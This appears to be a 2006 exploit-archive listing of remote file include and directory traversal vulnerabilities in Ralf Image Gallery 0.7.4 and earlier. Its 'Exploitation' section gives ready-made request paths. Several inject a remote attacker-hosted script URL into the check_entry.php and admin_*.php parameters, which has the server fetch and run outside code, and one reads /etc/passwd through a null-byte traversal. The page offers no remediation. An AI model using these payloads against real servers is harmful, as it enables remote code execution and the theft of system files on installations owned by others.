Ralf Image Gallery <= 0.7.4 Multiple Remote Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Ralf Image Gallery <= 0.7.4 Multiple Remote Vulnerabilities
# Published : 2006-06-22
# Author : Aesthetico
# Previous Title : Harpia CMS <= 1.0.5 Remote File Include Vulnerabilities
# Next Title : w-Agora <= 4.2.0 (inc_dir) Remote File Include Exploit

Title: Ralf Image Gallery <= 0.7.4 - Multiple Remote File Include and directory
traversal Vulnerabilities
-----------------------------------------------------------------
Vendor: RIG is developed and maintained by Le R'alf
URL: http://rig.powerpulsar.com/
-----------------------------------------------------------------

Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------

Exploitation:
-----------------------------------------------------------------

/check_entry.php?dir_abs_src=http://www.yourspace.com/yourscript.php?
/check_entry.php?dir_abs_src=../../../../../../../../../etc/passwd%00
/admin_album.php?dir_abs_admin_src=http://www.yourspace.com/yourscript.php?
/admin_image.php?dir_abs_admin_src=http://www.yourspace.com/yourscript.php?
/admin_translate.php?dir_abs_admin_src=http://www.yourspace.com/yourscript.php?

# www.Syue.com [2006-06-22]